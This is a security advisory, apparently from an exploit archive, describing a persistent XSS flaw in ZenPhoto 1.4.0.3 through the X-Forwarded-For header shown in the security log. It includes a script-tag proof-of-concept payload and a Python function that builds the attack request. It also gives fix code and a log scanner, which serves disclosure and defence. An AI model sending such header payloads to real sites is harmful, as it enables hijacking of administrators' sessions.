ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header persistent XSS

Tags: zenphoto

# Exploit Title: ZenPhoto 1.4.0.3 (patched 2011-4-19) x-forwarded-for HTTP Header persistent XSS

# Date:

# Author: Saif El-Sherei

# Software Link: http://zenphoto.googlecode.com/files/zenphoto-1.4.0.3.zip

# Version: 1.4.0.3 latest updated 2011-4-19

# Tested on: FF 3.0.15, IE 8

Info:

Zenphoto is an answer to lots of calls for an online gallery solution that just makes sense. After years of bloated software that does everything and your dishes, zenphoto just shows your photos, simply. It's got all the functionality and "features" you need, and nothing you don't. Where the old guys put in a bunch of modules and junk, we put a lot of thought. We hope you agree with our philosophy: simpler is better.

Details:

Failure to sanitize the "x-forwarded-for" HTTP header before the security log is displayed in "zp-core/admin-logs.php" could allow a remote attacker to inject malicious HTML code by altering the "x-forwarded-for" HTTP header, using either an intercepting proxy or manual requests. The header value is written into the security log as if it were the client's IP address and rendered without encoding each time the log is viewed, so the attacker can target any user with sufficient privilege to access "Security logs", usually application administrators, with persistent XSS. No account is needed: any request that causes a security-log entry to be written (a failed login attempt, for example) carries the crafted header with it.

POC (send as the value of the x-forwarded-for header, then wait for an administrator to open Security logs):

<script>alert('Saif was Here')</script>
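The flaw and its fix side by side, as an added Python example that is not part of the original advisory or of Zenphoto's own code. The host name, the request path, the tab-separated sample log and the sample addresses are constructed for illustration and do not reflect Zenphoto's real log-file layout; what the example shows is the one request an attacker needs, the unencoded rendering that makes the header dangerous, the two-layer fix (validate the header as an IP address on the way in, HTML-encode on the way out), and a check an operator can run over an existing log to find entries planted before patching.

```python
import html
import ipaddress
from typing import Optional

# Constructed sample values (not taken from the original advisory).
REMOTE_ADDR = "198.51.100.9"          # address the TCP connection actually came from
BENIGN_XFF = "203.0.113.7, 10.0.0.2"   # what a real reverse proxy would send
PAYLOAD_XFF = "<script>alert('Saif was Here')</script>"  # the advisory's payload


def build_poc_request(host: str, path: str, xff: str) -> bytes:
    """Raw HTTP/1.1 request as an intercepting proxy would send it.

    The only attacker-controlled part is the X-Forwarded-For value; the request
    needs no credentials. Host and path are hypothetical.
    """
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"X-Forwarded-For: {xff}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def vulnerable_log_cell(remote_addr: str, xff: Optional[str]) -> str:
    """Mimics the flaw: the header is trusted verbatim and echoed into HTML."""
    ip = xff if xff else remote_addr
    return f"<td>{ip}</td>"


def client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """Hardened input side: honour X-Forwarded-For only if its first hop is an IP.

    Anything that does not parse as an address is discarded and the socket
    address is logged instead, so markup never reaches the log file.
    """
    if xff:
        first_hop = xff.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(first_hop))
        except ValueError:
            pass
    return remote_addr


def safe_log_cell(remote_addr: str, xff: Optional[str]) -> str:
    """Hardened output side: validated value, still HTML-escaped when displayed."""
    return f"<td>{html.escape(client_ip(remote_addr, xff), quote=True)}</td>"


def is_tainted_ip_field(value: str) -> bool:
    """True if a field that should hold an IP address holds anything else."""
    try:
        ipaddress.ip_address(value.strip())
        return False
    except ValueError:
        return True


def tainted_entries(log_lines, ip_column=1, sep="\t"):
    """Line numbers (1-based) of log lines whose IP column is not an IP address."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        fields = line.rstrip("\n").split(sep)
        if len(fields) > ip_column and is_tainted_ip_field(fields[ip_column]):
            hits.append(n)
    return hits


# Constructed sample log; the column layout is illustrative, not Zenphoto's.
SAMPLE_LOG = [
    "2011-04-20 10:00:01\t203.0.113.7\tlogin failed\tadmin",
    "2011-04-20 10:00:05\t<script>alert('Saif was Here')</script>\tlogin failed\tadmin",
    "2011-04-20 10:01:00\t::1\tlogin ok\tadmin",
]

if __name__ == "__main__":
    print(build_poc_request("gallery.example", "/zp-core/admin.php", PAYLOAD_XFF).decode())
    print("vulnerable:", vulnerable_log_cell(REMOTE_ADDR, PAYLOAD_XFF))
    print("hardened:  ", safe_log_cell(REMOTE_ADDR, PAYLOAD_XFF))
    print("tainted log lines:", tainted_entries(SAMPLE_LOG))
```

Two caveats on the hardened version. Output encoding is the actual XSS fix; the IP validation is defence in depth that also keeps the log file itself clean. And even a well-formed X-Forwarded-For is attacker-supplied unless the application sits behind a proxy that overwrites it, so a security log should always record the socket address and treat the header as a separate, untrusted field rather than a replacement for it.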

Regards,

Saif El-Sherei
